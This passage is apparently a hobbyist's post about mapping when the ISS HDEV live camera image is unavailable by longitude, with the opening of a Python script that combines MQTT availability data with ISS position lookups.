 *    UserTransaction.begin
 *    DatabaseConnectionFactory.returnConnection
 *    DatabaseConnectionFactory.requestConnection
 *    DatabaseConnectionFactory.returnConnection
 *    UserTransaction.commit/rollback
 * 
 * 6. Connection is requested before the transaction and returned in the transaction
 *    and then connection is requested again in the transaction and returned after
 *    the transaction
 * 
 *    DatabaseConnectionFactory.requestConnection
 *    UserTransaction.begin
 *    DatabaseConnectionFactory.returnConnection
 *    DatabaseConnectionFactory.requestConnection
 *    UserTransaction.commit/rollback
 *    DatabaseConnectionFactory.returnConnection
 *
 * 7. Connection is requested in the transaction and returned in the transaction
 *    and then connection is requested again in the transaction and returned after
 *    the transaction
 * 
 *    UserTransaction.begin
 *    DatabaseConnectionFactory.requestConnection
 *    DatabaseConnectionFactory.returnConnection
 *    DatabaseConnectionFactory.requestConnection
 *    UserTransaction.commit/rollback
 *    DatabaseConnectionFactory.returnConnection
 *
 * 8. Connection is requested in the transaction and returned in the transaction
 *    and then connection is requested again in the transaction and returned in
 *    the transaction
 * 
 *    UserTransaction.begin
 *    DatabaseConnectionFactory.requestConnection
 *    DatabaseConnectionFactory.returnConnection
 *    DatabaseConnectionFactory.requestConnection
 *    DatabaseConnectionFactory.returnConnection
 *    UserTransaction.commit/rollback
 * 
 * What are the issues:
 * --------------------
 * A. If a thread acquires a connection before the transaction is started, then at
 *    the time when the transaction is started we have to associate the
 *    connection with the transaction.
 *    Affects: 1,3,5,6
 * 
 * A.1 If the connection wasn't used within the transaction, then the commit or
 *    rollback on the transaction should be a no op.
 * 
 * B. If the thread acquired a connection during the transaction, then this
 *    connection should be automatically associated with the transaction.
 *    Affects: 2,4,5,6,7,8
 * 
 * C. If a thread returns the connection before the transaction is finished, then
 *    the transaction manager has to keep the connection open until the thread
 *    ends the transaction.
 *    Affects: 3,4,5,8
 * 
 * D: If the thread keeps the connection after the transaction is finished, then
 *    after the transaction is finished the connection should be fully usable
 *    as any other JDBC connection including autocommit and commit/rollback,
 *    but in the transaction the autocommit/commit/rollback should be disabled.
 *    Affects: 1,2,6,7
 * 
 * E: If the thread requests and returns a connection multiple times during the
 *    same transaction, then the same connection has to be given to it since
 *    the transaction is responsible for doing commit/rollback on the connection
 *    and our assumption is that the thread is using only a single connection.
 *    Affects: 5,6,7,8
 * 
 * What are the solutions:
 * -----------------------
 * A: The DatabaseConnectionFactory has to keep track if there is a connection
 *    issued to the calling thread so that when the transaction is started,
 *    this connection can be associated to the transaction.
 *    This can be done using a ThreadLocal storing the requested connection. Then
 *    when the transaction is started, the UserTransaction has to check if there
 *    is an already requested connection and associate it with the transaction.
 *    This can be done using a ThreadLocal storing the transactional connection.
 * 
 * A.1 This can be done by creating a wrapper around Connection.
 *    The DatabaseConnectionFactory will then on request and return create this
 *    wrapper which delegates all calls into the underlying connection. When any
 *    method is called, it marks the connection as used. The transaction manager
 *    can then reset the used flag when the connection is first time associated
 *    with a transaction or check it once commit or rollback were issued.
 * 
 * B: The DatabaseConnectionFactory has to be aware of the started transaction
 *    and when a connection is requested, the connection is associated
 *    with the transaction.
 *    This can be done using a ThreadLocal storing a flag if the transaction is
 *    in progress or not. If the transaction is in progress, the returned
 *    connection will be stored in the transactional connection.
 * 
 * C: The UserTransaction has to keep track of the connection which was used
 *    in the transaction and not allow it to be returned until the transaction is
 *    finished. Then, once the transaction is finished, it has to return the
 *    connection.
 *    This can be done using a ThreadLocal storing a flag for the transactional
 *    connection if the connection was returned in the transaction or not.
 * 
 * D: The connection should be aware if there is a transaction in progress or
 *    not and based on that allow autocommit and commit or rollback or not.
 *    This can be done by creating a wrapper around Connection.
 *    The DatabaseConnectionFactory will then on request and return create this
 *    wrapper which delegates all calls into the underlying connection and
 *    intercepts and checks autocommit and commit and rollback.
 * 
 * E. The DatabaseConnectionFactory has to be aware of the started transaction
 *    and when a connection is requested, the connection already associated
 *    with the transaction should be returned.
 * 
 * What are the implications:
 * --------------------------
 * 1. If the connection is associated with a transaction, it is not returned to the
 *    factory and not available for others. This is natural since there are some
 *    operations pending on that connection and even though the thread said it
 *    no longer needs it, it cannot be reused until the operations are flushed
 *    with commit/rollback.
 * 
 * Implementation:
 * ---------------
 * 1. D. requires us to create a wrapper around the connection. We will implement
 *    a TransactionalConnection class as a wrapper around the JDBC Connection class,
 *    which will delegate all operations directly except setautocommit/commit/rollback,
 *    which will be delegated only after a check for a pending transaction.
 * 
 * 2. The previous step required us to create integration between DatabaseTransactionFactory
 *    and DatabaseConnectionFactory, so that the transaction factory can act as
 *    a proxy for the connection factory and get the real connection and wrap
 *    it with a wrapper. This will be implemented as a delegator pattern
 *    when DatabaseConnectionFactoryImpl will be delegating calls to
 *    DatabaseTransactionFactoryImpl and vice versa.
 * 
 *    The requestConnection call will
 *    - check if there is a transaction in progress; if there is and it has an
 *      already associated connection, then the connection associated with the
 *      transaction will be returned.
 *    - if there is no transaction in progress and there is already a connection
 *      issued, then return the same connection since this would represent the
 *      situation (such as a subprocedure call)
 *      DatabaseConnectionFactory.requestConnection
 *      DatabaseConnectionFactory.requestConnection
 *      DatabaseConnectionFactory.returnConnection
 *      DatabaseConnectionFactory.returnConnection
 *    - if there is no transaction in progress and no already issued connection,
 *      then get a connection from the underlying connection factory, create a wrapper
 *      and remember the connection as issued using a ThreadLocal.
 *      This will solve A, B and E
 * 
 *    The returnConnection call will
 *    - check if there is a transaction in progress; if there is, then the
 *      connection will not be returned to the factory and will be returned when
 *      the transaction is done
 *    - if there is no transaction in progress, then the underlying connection
 *      will be returned to the factory
 *      This will solve C
 * 
 * 3. We will provide an implementation of UserTransaction.
 * 
 *    The begin call will
 *    - check if there was a connection issued and if it was, it will associate
 *      it with this transaction. It will also tell the connection that it
 *      is part of the transaction to ignore the setautocommit/commit/rollback
 *      calls.
 * 
 *    The commit call will
 *    - if there is a connection associated with this transaction, commit
 *      the connection. If the connection was returned to the factory in the
 *      transaction, then this time it will be really returned to the factory,
 *      otherwise it will be just disassociated from this transaction so that
 *      the setautocommit/commit/rollback calls are no longer ignored.
 * 
 *    The rollback call will
 *    - if there is a connection associated with this transaction, roll back
 *      the connection. If the connection was returned to the factory in the
 *      transaction, then this time it will be really returned to the factory,
 *      otherwise it will be just disassociated from this transaction so that
 *      the setautocommit/commit/rollback calls are no longer ignored.
 * 
 *    TransactionalConnection
 *    To distinguish if the TransactionalConnection was associated in a transaction,
 *    it will have an inTransaction flag.
 *    To distinguish if the TransactionalConnection was used during the transaction,
 *    it will have a used flag which will be false initially and set to true if
 *    any method on the connection is called.
 *    To distinguish if the TransactionalConnection was returned to the factory or it
 *    is still used by the application, it will have an active counter which will be
 *    incremented when the connection is requested from the factory and decremented
 *    when it is returned.
the outcome has been359 * determined as rollback.360 */ 361 public static final Integer STATUS_ROLLEDBACK_OBJ 362 = new Integer (Status.STATUS_ROLLEDBACK);363 364 /**365 * A transaction is associated with the target object and it is in the process366 * of rolling back.367 */ 368 public static final Integer STATUS_ROLLING_BACK_OBJ 369 = new Integer (Status.STATUS_ROLLING_BACK);370 371 /**372 * A transaction is associated with the target object but its current status373 * cannot be determined.374 */ 375 public static final Integer STATUS_UNKNOWN_OBJ 376 = new Integer (Status.STATUS_UNKNOWN);377 378 // Attributes ///////////////////////////////////////////////////////////////379 380 /**381 * Database connection which this thread requested from the factory. The 382 * current assumption is that the thread can have only one connection at 383 * a time. The connection can be part of global transaction (since there is 384 * only one transaction per thread then this connection really represents 385 * the transaction). The stored data have type TransactionConnection.386 */387 private ThreadLocal m_connection; 388 389 /**390 * This is the real database connection which is wraped in TransactionConnection391 * since the TransactionConnection doesn't allow us to access it.392 */393 private ThreadLocal m_realConnection; 394 395 /**396 * Transaction that is currently in progress if any. The current assumption397 * is that there can be only one transaction active per thread. 
The stored398 * data have type Integer with values defined in javax.transaction.Status399 * interface.400 */401 private ThreadLocal m_transaction;402 403 // Cached values ////////////////////////////////////////////////////////////404 405 /**406 * Logger for this class407 */408 private static Logger s_logger = Log.getInstance(SimpleLocalTransactionFactoryImpl.class);409 410 // Constructors /////////////////////////////////////////////////////////////411 412 /**413 * Default constructor using default database connection factory.414 * 415 * @throws OSSException - an error has occured 416 */417 public SimpleLocalTransactionFactoryImpl(418 ) throws OSSException419 {420 super();421 422 // Don't make it inheritable so that spawn threads can have their own423 // connections and transactions424 m_connection = new ThreadLocal ();425 m_transaction = new ThreadLocal ();426 m_realConnection = new ThreadLocal ();427 }428 429 // DatabaseTransactionFactory methods ///////////////////////////////////////////////430 431 /**432 * {@inheritDoc}433 */434 public UserTransaction requestTransaction()435 {436 // This class acts also as user transaction437 UserTransaction transaction = this;438 439 if (s_bTransactionMonitor)440 {441 transaction = new DelegatingUserTransaction(transaction);442 }443 return transaction;444 }445 446 /**447 * {@inheritDoc}448 */449 public void reset(450 ) throws OSSException451 {452 // The only thing we can do is reset the thread local again. This method453 // should be used only for testing454 s_logger.severe("About to reset state of transaction manager." 
+455 " Hope you know what you are doing.");456 m_connection = new ThreadLocal ();457 m_transaction = new ThreadLocal ();458 m_realConnection = new ThreadLocal (); 459 }460 461 /**462 * {@inheritDoc}463 */464 public void stop(465 ) throws OSSException466 {467 // The transaction factory stop is noop since we don't do here anything 468 // special 469 }470 471 /**472 * {@inheritDoc}473 */474 public TransactionManager getTransactionManager(475 )476 {477 // There is no transaction manager for this factory since it would require478 // us to implement the XA classes it references and we really care only479 // about UserTransaction480 return null;481 }482 483 // UserTransaction methods //////////////////////////////////////////////////484 485 /**486 * {@inheritDoc}487 */488 public void begin(489 ) throws NotSupportedException , 490 SystemException 491 {492 try493 {494 if (isTransactionInProgress())495 {496 throw new NotSupportedException ("Cannot start another transaction while" +497 " one is still in progress."); 498 }499 else500 {501 m_transaction.set(STATUS_ACTIVE_OBJ);502 503 TransactionalConnection existingConnection;504 505 existingConnection = (TransactionalConnection)m_connection.get();506 if (existingConnection != null)507 {508 // There is already a connection issued from the factory which 509 // was issued before the transaction was started so make sure 510 // the connection knows it is in transaction so it doesn't allow511 // commit/rollback/setautocommit512 if (GlobalConstants.ERROR_CHECKING)513 {514 assert (!existingConnection.isInTransaction())515 : "Connection cannot be already in transaction when" +516 " transaction is only starting.";517 }518 519 try520 {521 // The connection wasn't used in transaction yet522 existingConnection.setUsed(false);523 existingConnection.setInTransaction(true);524 }525 catch (SQLException sqleExc)526 {527 SystemException sysExc = new SystemException (528 "Cannot associate connection with transaction.");529 
sysExc.initCause(sqleExc);530 throw sysExc;531 }532 }533 else534 {535 // If there is no connection then we don't have to worry about 536 // and anything when the connection will be requested from the 537 // factory it will be associated to this transaction.538 }539 }540 }541 catch (OSSException ossExc)542 {543 throw new SystemException ("Error occured while retrieving information " +544 "about transaction status.");545 }546 }547 548 /**549 * {@inheritDoc}550 */551 public void commit(552 ) throws RollbackException , 553 HeuristicMixedException , 554 HeuristicRollbackException , 555 SecurityException , 556 IllegalStateException , 557 SystemException 558 {559 endTransaction(true);560 }561 562 /**563 * {@inheritDoc}564 */565 public int getStatus(566 ) throws SystemException 567 {568 Integer iTransactionStatus = (Integer )m_transaction.get();569 int iStatus;570 571 if (iTransactionStatus == null)572 {573 iStatus = Status.STATUS_NO_TRANSACTION;574 }575 else576 {577 iStatus = iTransactionStatus.intValue();578 }579 580 return iStatus; 581 }582 583 /**584 * {@inheritDoc}585 */586 public void rollback(587 ) throws IllegalStateException , 588 SecurityException , 589 SystemException 590 {591 endTransaction(false);592 }593 594 /**595 * {@inheritDoc}596 */597 public void setRollbackOnly(598 ) throws IllegalStateException , 599 SystemException 600 {601 try602 {603 if (isTransactionInProgress())604 {605 m_transaction.set(STATUS_MARKED_ROLLBACK_OBJ);606 }607 else608 {609 throw new IllegalStateException ("No transaction in progress to be marked" +610 " rollbacked only."); 611 }612 }613 catch (OSSException ossExc)614 {615 throw new SystemException ("Error occured while retrieving information " +616 "about transaction status.");617 }618 }619 620 /**621 * {@inheritDoc}622 */623 public void setTransactionTimeout(624 int arg0625 ) throws SystemException 626 {627 // At this time there is no way how to set time out for transaction628 // TODO: Feature: Implement transaction timeout for this 
factory629 } 630 631 // Helper methods ///////////////////////////////////////////////////////////632 633 /**634 * Check if there is an transaction in progress, if there is and it has 635 * already associated connection then the connection associated with the636 * transaction will be returned.637 * If there is no transaction in progress and there is already connection 638 * issued then return the same connection since this would represent the 639 * situation (such as subprocedure call)640 * DatabaseConnectionFactory.requestConnection641 * DatabaseConnectionFactory.requestConnection642 * DatabaseConnectionFactory.returnConnection643 * DatabaseConnectionFactory.returnConnection644 * If there is no transaction in progress and no already issued connection645 * then get connection from the calling connection factory, create wrapper 646 * and remember the connection as issued using ThreadLocal.647 * 648 * @param bAutoCommit {@inheritDoc}649 * @param strDataSourceName {@inheritDoc}650 * @param strUser {@inheritDoc}651 * @param strPassword {@inheritDoc}652 * @param connectionFactory {@inheritDoc}653 * @return {@inheritDoc}654 * @throws OSSDatabaseAccessException {@inheritDoc}655 */656 protected Connection requestTransactionalConnection(657 boolean bAutoCommit,658 String strDataSourceName, 659 String strUser, 660 String strPassword, 661 DatabaseConnectionFactoryImpl connectionFactory662 ) throws OSSDatabaseAccessException663 {664 TransactionalConnection existingConnection;665 Connection existingRealConnection;666 boolean bTransaction;667 668 existingConnection = (TransactionalConnection)m_connection.get();669 existingRealConnection = (Connection )m_realConnection.get();670 try671 {672 bTransaction = isTransactionInProgress();673 }674 catch (SystemException sysExc)675 {676 throw new OSSDatabaseAccessException(677 "There was an exception occured while retrieving UserTransaction " +678 "status.", sysExc);679 }680 catch (OSSException osseExc)681 {682 throw new 
OSSDatabaseAccessException(683 "There was an exception occured while retrieving UserTransaction " +684 "status.", osseExc);685 }686 687 if (existingConnection != null)688 { 689 // There is already a connection issued from the factory so it should690 // be already associated with transaction so test for it 691 if (GlobalConstants.ERROR_CHECKING)692 {693 assert (((!existingConnection.isInTransaction()) && (!bTransaction))694 || ((existingConnection.isInTransaction()) && (bTransaction)))695 : "Connection status about transaction in progress doesn't" +696 " match the reality.";697 assert existingConnection.verifyConnection(existingRealConnection)698 : "The real database connection is not the one which is wrapped" +699 " in transactional wrapper.";700 }701 702 // Now make sure that this is connection for the same user as requested703 String strCurrentDataSourceName;704 String strExistingDataSourceName;705 String strExistingUser;706 String strExistingPassword;707 708 if (strDataSourceName == null)709 {710 strCurrentDataSourceName = connectionFactory.getDefaultDataSourceName();711 }712 else713 {714 strCurrentDataSourceName = strDataSourceName;715 }716 strExistingDataSourceName = existingConnection.getDataSourceName();717 strExistingUser = existingConnection.getUser();718 strExistingPassword = existingConnection.getPassword();719 720 // I think we do want to compare as == since we want to verify that the721 // same connection factory for which we already have connection722 // is trying to get a new one723 if (connectionFactory != existingConnection.getConnectionFactory())724 {725 throw new OSSDatabaseAccessException(726 "Cannot issue connection from the factory for a different" +727 " connection factory that the factory for which the" +728 " connection is already issued."); 729 }730 731 if ((((strCurrentDataSourceName == null) && (strExistingDataSourceName == null))732 || ((strCurrentDataSourceName != null) 733 && 
(strCurrentDataSourceName.equals(strExistingDataSourceName))))734 && (((strUser == null) && (strExistingUser == null))735 || ((strUser != null) && (strUser.equals(strExistingUser))))736 && (((strPassword == null) && (strExistingPassword == null))737 || ((strPassword != null) && (strPassword.equals(strExistingPassword)))))738 { 739 // Make this connection active again since we are issuing it from 740 // the factory741 existingConnection.setActive(true);742 }743 else744 {745 // The data source, user name or password doesn't match so do not746 // return connection since the assumption is that there can be747 // only one connection at a time748 throw new OSSDatabaseAccessException(749 "Cannot issue connection from the factory for a different" +750 " user than the user for which the connection is already issued.");751 }752 }753 else754 {755 Connection realConnection;756 757 // There is no connection yet so create a new one. Here we have to758 // call the non transaction version of the requestConnection method759 // since the transactional version is the one which called us.760 realConnection = super.requestTransactionalConnection(bAutoCommit, 761 strDataSourceName, strUser, strPassword, 762 connectionFactory);763 764 if (strDataSourceName == null)765 {766 strDataSourceName = connectionFactory.getDefaultDataSourceName();767 }768 769 existingConnection = new TransactionalConnection(770 realConnection,771 strDataSourceName,772 strUser,773 strPassword,774 bTransaction,775 connectionFactory);776 // Remember this connection777 m_connection.set(existingConnection);778 // Remember the real connection since we will need to return it and779 // the TransactionalConnection doesn't allow us to access it 780 m_realConnection.set(realConnection);781 }782 783 return existingConnection;784 }785 786 /**787 * {@inheritDoc}788 */789 protected void returnTransactionalConnection(790 Connection cntDBConnection,791 DatabaseConnectionFactoryImpl connectionFactory792 )793 {794 if 
(cntDBConnection != null)795 {796 if (cntDBConnection instanceof TransactionalConnection)797 {798 // This is a transaction aware connection so process it as such799 TransactionalConnection connection;800 Connection realConnection;801 802 connection = (TransactionalConnection)cntDBConnection; 803 realConnection = (Connection )m_realConnection.get();804 if (GlobalConstants.ERROR_CHECKING)805 {806 TransactionalConnection existingConnection;807 existingConnection = (TransactionalConnection)m_connection.get();808 809 // The returned connection is not the one we think we issued so this 810 // is error811 assert (existingConnection != null) 812 && (existingConnection == connection) // this should be ==813 : "The returned connection is not the one we think we issued: " +814 " existing connection is " + existingConnection + 815 " returned connection is " + connection;816 assert existingConnection.verifyConnection(realConnection)817 : "The real database connection is not the one which is wrapped" +818 " in transactional wrapper.";819 // This should be ==820 assert connectionFactory == existingConnection.getConnectionFactory()821 : "Cannot issue connection from the factory for a different" +822 " connection factory that the factory for which the" +823 " connection is already issued."; 824 }825 826 // Mark it as inactive since we are returning it827 connection.setActive(false);828 // Since the connection could have been requested multiple times, it can829 // still be active (it has to be returned the same amount of times)830 if ((!connection.isInTransaction()) && (!connection.isActive()))831 {832 // This connection is not part of the transaction and it is not 833 // active anymore so return it back to the real factory by calling834 // the nontransactional method835 super.returnTransactionalConnection(realConnection, connectionFactory);836 // Also since this connection is completely released, release it837 m_connection.set(null);838 m_realConnection.set(null);839 }840 else841 
{842 // The connection is part of the transaction so the transaction will843 // return it when it is done or if the connection is still active 844 // even after it was set inactive that means that the connection was845 // requested multiple times and must be returned multiple times.846 }847 }848 else849 {850 // This is just a regular connection which may have been allocated851 // before the transaction factory was created so just return it852 super.returnTransactionalConnection(cntDBConnection, connectionFactory);853 }854 }855 }856 857 /**858 * End active transaction by commit or rollback.859 * 860 * @param bCommit - if true then transaction will be commited otherwise861 * it will be rollbacked.862 * @throws SystemException - and error has occured during commit/rollback863 */864 protected void endTransaction(865 boolean bCommit866 ) throws SystemException 867 {868 Integer iTransactionStatus = (Integer )m_transaction.get();869 870 if (iTransactionStatus != null)871 {872 if (iTransactionStatus.intValue() == Status.STATUS_MARKED_ROLLBACK)873 {874 // We have to rollback.875 bCommit = false;876 }877 878 if (iTransactionStatus.intValue() == Status.STATUS_ACTIVE)879 {880 try881 {882 TransactionalConnection existingConnection;883 884 existingConnection = (TransactionalConnection)m_connection.get();885 if (existingConnection != null)886 {887 // There was connection associated with this transaction888 if (GlobalConstants.ERROR_CHECKING)889 {890 assert existingConnection.isInTransaction()891 : "The connection is not associated to transaction.";892 }893 894 // The connection was used inside of transaction so lets895 // disassociate it with transaction which will allow us896 // to commit/rollback on the connection897 try898 {899 existingConnection.setInTransaction(false);900 // Now commit/rollback901 if (bCommit)902 {903 if (existingConnection.isUsed())904 {905 // Commit the connection only if it was used in transaction906 existingConnection.commit();907 }908 // We have to 
always change the state of the transaction909 m_transaction.set(STATUS_COMMITTED_OBJ);910 }911 else912 {913 if (existingConnection.isUsed())914 {915 // Rollback the connection only if it was used in transaction916 existingConnection.rollback();917 }918 // We have to always change the state of the transaction919 m_transaction.set(STATUS_ROLLEDBACK_OBJ);920 }921 // Since we flushed all operations, the connection is not922 // used anymore923 existingConnection.setUsed(false);924 }925 catch (SQLException sqleExc)926 {927 SystemException sysExc;928 if (bCommit)929 {930 sysExc = new SystemException (931 "An error has occured during commit.");932 }933 else934 {935 sysExc = new SystemException (936 "An error has occured during rollback.");937 }938 sysExc.initCause(sqleExc);939 throw sysExc;940 }941 if (!existingConnection.isActive())942 {943 // The connection is no longer active so we need to 944 // return it back to the factory945 Connection realConnection;946 947 realConnection = (Connection )m_realConnection.get();948 if (GlobalConstants.ERROR_CHECKING)949 {950 assert existingConnection.verifyConnection(realConnection)951 : "The real database connection is not the one which is wrapped" +952 " in transactional wrapper.";953 }954 // This connection is not part of the transaction and it 955 // is not active anymore so return it back to the real factory.956 existingConnection.getConnectionFactory().returnNonTransactionalConnection(957 realConnection);958 // Also since this connection is completely released, release it959 m_connection.set(null);960 m_realConnection.set(null);961 }962 }963 else964 {965 // If there wasn't any active connection that means nothing was966 // done inside of the transaction so we just need to reset967 // the status968 if (bCommit)969 {970 m_transaction.set(STATUS_COMMITTED_OBJ);971 }972 else973 {974 m_transaction.set(STATUS_ROLLEDBACK_OBJ);975 }976 }977 }978 finally979 {980 // This is here just to check that once we are done with the code981 // 
above we have somehow completed transaction status (that mean982 // every branch somehow sets correctly) transaction status. The983 // reason is that we had a bug here when the transaction wasn't984 // reset if there was no work performed in the transaction985 if (GlobalConstants.ERROR_CHECKING)986 {987 iTransactionStatus = (Integer )m_transaction.get();988 // We can use == since only these two constants can be set989 assert ((iTransactionStatus == STATUS_ROLLEDBACK_OBJ)990 || (iTransactionStatus == STATUS_COMMITTED_OBJ))991 : "Transaction wasn't commited nor rollbacked.";992 }993 }994 }995 else996 {997 if (bCommit)998 {999 throw new IllegalStateException (1000 "Transaction cannot be commited if it wasn't started.");1001 }1002 else1003 {1004 throw new IllegalStateException (1005 "Transaction cannot be rollbacked if it wasn't started.");1006 }1007 }1008 }1009 else1010 {1011 if (bCommit)1012 {1013 throw new IllegalStateException (1014 "Transaction cannot be commited if it wasn't started.");1015 }1016 else1017 {1018 throw new IllegalStateException (1019 "Transaction cannot be rollbacked if it wasn't started.");1020 }1021 }1022 }1023}1024
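The factory above keys all of its per-thread state (the issued connection, the wrapped real connection, and the transaction status) off ThreadLocal slots, deliberately using plain ThreadLocal rather than InheritableThreadLocal so spawned threads start clean. A minimal, self-contained sketch of that pattern follows; the class, enum, and method names here are illustrative stand-ins, not the OpenSubsystems API:

```java
// Minimal sketch of the per-thread transaction-status pattern used above.
// TxState is a stand-in for javax.transaction.Status; not the real API.
public class ThreadLocalTxDemo {
    enum TxState { NO_TRANSACTION, ACTIVE, COMMITTED, ROLLEDBACK }

    // Deliberately a plain ThreadLocal (not InheritableThreadLocal) so that
    // spawned threads start with their own, empty transaction state.
    private static final ThreadLocal<TxState> TX = new ThreadLocal<>();

    static TxState status() {
        TxState s = TX.get();
        return s == null ? TxState.NO_TRANSACTION : s;
    }

    static void begin() {
        if (status() == TxState.ACTIVE) {
            throw new IllegalStateException("Transaction already in progress.");
        }
        TX.set(TxState.ACTIVE);
    }

    static void commit() {
        if (status() != TxState.ACTIVE) {
            throw new IllegalStateException("Transaction wasn't started.");
        }
        TX.set(TxState.COMMITTED);
    }

    public static void main(String[] args) throws Exception {
        begin();
        commit();
        System.out.println(status());      // state set on this thread
        Thread t = new Thread(() ->
            System.out.println(status())); // another thread sees no transaction
        t.start();
        t.join();
    }
}
```

The second thread prints NO_TRANSACTION because the ThreadLocal slot is empty there, which is exactly why the real factory's reset() can only swap the ThreadLocal objects wholesale.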
http://kickjava.com/src/org/opensubsystems/core/persist/db/transaction/SimpleLocalTransactionFactoryImpl.java.htm | CC-MAIN-2017-30 | en | refinedweb
The changes between 3.2.76 and 3.3.62 are described directly below.
The change is forward compatible in that JE files created with release 3.2.* and earlier can be read when opened with JE 3.3.62. The change is not backward compatible in that files created with JE 3.3.62 cannot be read by earlier releases. Note that if an existing environment is opened read/write, a new log file is written by JE 3.3.62.
return operation and byte counts for the number of random and sequential disk IOs. All values are approximate and may differ from the actual number of operations/byte-counts depending on the type of disks and file system, disk geometry, and file system cache size. [#16086]
If the application used a custom comparator defined as
public class MyCompare implements Comparator, Serializable
that should now be declared as
public class MyCompare implements Comparator<byte[]>, Serializable
Please note that while these are fine:
Comparator<byte[]> compareInstance = new MyCompare();
dbConfig.setBtreeComparator(compareInstance);
or
dbConfig.setBtreeComparator(MyCompare.class);
the following previously legal line will now provoke a compile error:
dbConfig.setBtreeComparator(compareInstance.getClass());
The compile error is puzzling and regrettably breaks compile time compatibility with JE 3.2 and earlier, but comes about because in Java, due to its type erasure based generics scheme, all the instances of a generic class have the same runtime class. Instead, the application has to apply the following cast:
dbConfig.setBtreeComparator((Class<? extends Comparator<byte[]>>) compareInstance.getClass());
http://www.oracle.com/technetwork/products/berkeleydb/downloads/je3362-changelog-083569.html | CC-MAIN-2015-06 | en | refinedweb
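The erasure behavior behind the changelog's cast can be seen directly: every instance of a generic class shares one runtime Class object, so getClass() on a Comparator<byte[]> variable is only typed Class<? extends Comparator>, and recovering the <byte[]> parameter needs an explicit unchecked cast. A small illustration, with a hypothetical MyCompare stand-in for the comparator the changelog describes:

```java
import java.io.Serializable;
import java.util.Comparator;

public class ErasureDemo {
    // Hypothetical comparator in the style described by the JE changelog.
    static class MyCompare implements Comparator<byte[]>, Serializable {
        public int compare(byte[] a, byte[] b) {
            return Integer.compare(a.length, b.length);
        }
    }

    public static void main(String[] args) {
        Comparator<byte[]> instance = new MyCompare();

        // All instances share one runtime class; the <byte[]> is erased.
        System.out.println(instance.getClass() == MyCompare.class); // true

        // getClass() is typed Class<? extends Comparator>, so an explicit
        // (unchecked) cast is needed to get Class<? extends Comparator<byte[]>>:
        @SuppressWarnings("unchecked")
        Class<? extends Comparator<byte[]>> c =
            (Class<? extends Comparator<byte[]>>) instance.getClass();
        System.out.println(c.getSimpleName());
    }
}
```

Passing MyCompare.class directly avoids the cast, which is why the changelog's first two usages compile unchanged.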
Hi All,
I need to replace Perl's built-in open() function. The reason I want to
do this is described in detail in another recent post of mine.
In a nutshell, I have to do encoding conversions on filename arguments
(unicode -> CP932).
Actually, it's not only open() I need to wrap, but open() appears
to be the most flexible beast of those, and I'd very much appreciate it if
some of you wise monks could take a look at what I currently have, and
let me know if I've overlooked something...
_____ I18N/Japanese.pm (the 'compatibility' module) _____
package I18N::Japanese;
use Encode 'encode';
use Symbol 'qualify_to_ref';
# eventually, determine this dynamically
my $encoding = "cp932";
# this is meant to take effect for whoever uses us
require encoding; encoding->import($encoding);
# override/wrap Perl built-ins that take or return filenames
# (... snippage of all but open()-wrapper)
*CORE::GLOBAL::open = sub (*@) {
my $fhref = \$_[0];
my $autov = !defined $_[0];
my $fh = qualify_to_ref(shift, scalar caller);
# pass filehandle up to caller when "open my $f, ..."
$$fhref = $fh if $autov;
my ($arg2, $arg3, @args) = convert_encoding(@_);
# need to handle the different prototypes separately
if (@_ >= 3) {
CORE::open $fh, $arg2, $arg3, @args;
} elsif (@_ == 2) {
if (defined $arg3) {
CORE::open $fh, $arg2, $arg3;
} else {
# must be undef _syntactically_
CORE::open $fh, $arg2, undef;
}
} elsif (@_ == 1) {
CORE::open $fh, $arg2;
} else {
CORE::open $fh;
}
};
sub convert_encoding {
return ( map ref(\$_) eq 'SCALAR' ? encode($encoding, $_) : $_, @_ );
}
1;
_____ using the replaced open() _____
use I18N::Japanese;
open F, ">", "myfile" and print F "foo\n";
open my $f, ">", "myfile" or die $!;
print $f "foo\n";
# ...
I believe this code is able to handle all various usages of open() ...
but please don't hesitate to prove me wrong ;) Otherwise, well, I'd be
glad to share this snippet with whoever in need might google this up in
the future.
(Note: the encoding conversion aspect is not what I'm worried about
at the moment, but rather whether the replaced open() is still behaving
like the built-in one, interface-wise)
Thanks,
Almut
BTW, what operating Windows you have..? Err, what system operates your windows? What is your $^O? :)
All in all, you may be better off not overriding 'open' for such purposes; the danger is not worth the risk!
If your $^O is MSWin32, then following my advice could help: Re: enumerate windows unicode filenames
HTH
I deliberately chose to use CORE::GLOBAL in my specific case
(despite the unless-you-know-what-you're-doing type of warnings in
"Overriding Built-in Functions", Chap 11.3, the Camel Book).
Only having a vague idea of what the existing code1
looks like, I thought that, all in all, I might be better off replacing
the built-ins globally. As I understand it, Exporter does only
export into a specific namespace, e.g.
_____ MySystem.pm _____
package MySystem;
use Exporter 'import';
@EXPORT = qw(system);
sub system {
print "wrapped system(): @_\n";
}
1;
_____ test.pl _____
#!/usr/bin/perl
use MySystem;
system "echo foo";
package SomeOtherModule;
system "echo bar";
would print
$ ./test.pl
wrapped system(): echo foo
bar
i.e. the second call of system() is not being wrapped...
I'd rather not have to take care of such subtleties (not all that
sure I'm not getting myself into other subtleties this way, though... ;)
Could you elaborate on why not to use CORE:: ?
Almut
_____
1
as I mentioned in Using literal Japanese filenames in legacy CP932 encoding with system(), etc., the idea behind writing a jperl
compatibility module is that the large number of existing scripts wouldn't need to be modified.
#include <Xm/Text.h> void XmTextReplace( Widget widget, XmTextPosition from_pos, XmTextPosition to_pos, char * value);
XmTextReplace replaces part of the text string in the Text. The XmNmotionVerifyCallback is generated if to_pos is less than or equal to the cursor position and the length of value is not the same as the length of the text being replaced, or if the cursor position is between from_pos and to_pos, and the distance from the cursor position to from_pos is greater than the length of value.
For a complete definition of Text and its associated resources, see XmText(3).
XmText(3) and XmTextReplaceWcs(3). | http://www.makelinux.net/man/3/X/XmTextReplace | CC-MAIN-2015-06 | en | refinedweb |
Login Authentication using Bean and Servlet In JSP
Login Authentication using Bean and Servlet In JSP... developed a web application of
login authentication using Bean in JSP. Five... a webpage "loginbean.jsp" to
set the parameter using JSP Bean and forward login page
jsp login page hi tell me how to create a login page using jsp and servlet and not using bean... please tell how to create a database in sql server... please tell with code application
login application how to create login application ?
Hi,
Please check the following tutorials:
Video tutorial - JSP Login Logout Example
Login Authentication using Bean and Servlet In JSP
simple code to login user
bean object
object i have to retrieve data from the database and want to store in a variable using
Login & Registration - JSP-Servlet
Login & Registration Pls tell how can create login and registration step by step in servlet.
how can show user data in servlet and how can add and remove user only in servlet. Hi Friend,
Please visit... for a particular
request and define controller by using bean properties adding following... to add validator
for a login request. The Code for dispatcher-servlet servlet.xml
login page with mysql using jsp
